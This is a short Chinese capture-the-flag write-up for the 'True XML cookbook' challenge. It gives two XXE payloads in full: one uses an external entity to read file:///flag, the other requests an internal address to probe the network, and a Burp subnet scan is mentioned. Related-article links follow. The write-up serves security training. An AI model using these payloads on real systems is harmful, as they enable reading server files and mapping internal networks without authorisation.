True XML cookbook

worker..2024-08-26 1:38

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "file:///flag">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>

<!DOCTYPE llw [

<!ENTITY file SYSTEM "http://10.244.80.49/">

]>

<user>

<username>&file;</username>

<password>1</password>

</user>

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

相关推荐
сокол8 小时前
【网安-Web渗透测试-漏洞系列】XXE漏洞
xml·web安全·php
树码小子2 天前
Mybatis(13)MyBatis Generator(xml生成器)& Mybatis-Plus初识
xml·mybatis
MX_93596 天前
Spring xml 方式整合第三方框架总结加案例
xml·java·spring
工程师老罗10 天前
YoloV1数据集格式转换,VOC XML→YOLOv1张量
xml·人工智能·yolo
wpyok16810 天前
密钥检测错误代码xml构建
xml
林开落L10 天前
从入门到了解:Protobuf、JSON、XML 核心解析(C++ 示例)
xml·c++·json·protobuffer·结构化数据序列化机制
介一安全11 天前
【Web安全】XML注入全手法拆解
xml·web安全·安全性测试
2301_8187320614 天前
项目启动报错,错误指向xml 已解决
xml·java·数据库·后端·springboot
csdn2015_15 天前
generatorConfig.xml 配置 Controller、Service 完整教程
xml·mybatis
特立独行的猫a15 天前
从XML到Compose的UI变革:现代(2026)Android开发指南
android·xml·ui·compose·jetpack
热门推荐
01GitHub 镜像站点02从零搭建一个 PHP 登录注册系统(含完整源码)03使用 1panel面板 部署 php网站04AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot05MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法06openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08让你的代码更整洁:10 个必知的 Kotlin 扩展函数09如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解10openclaw 配置飞书 报错 应用未建立长连接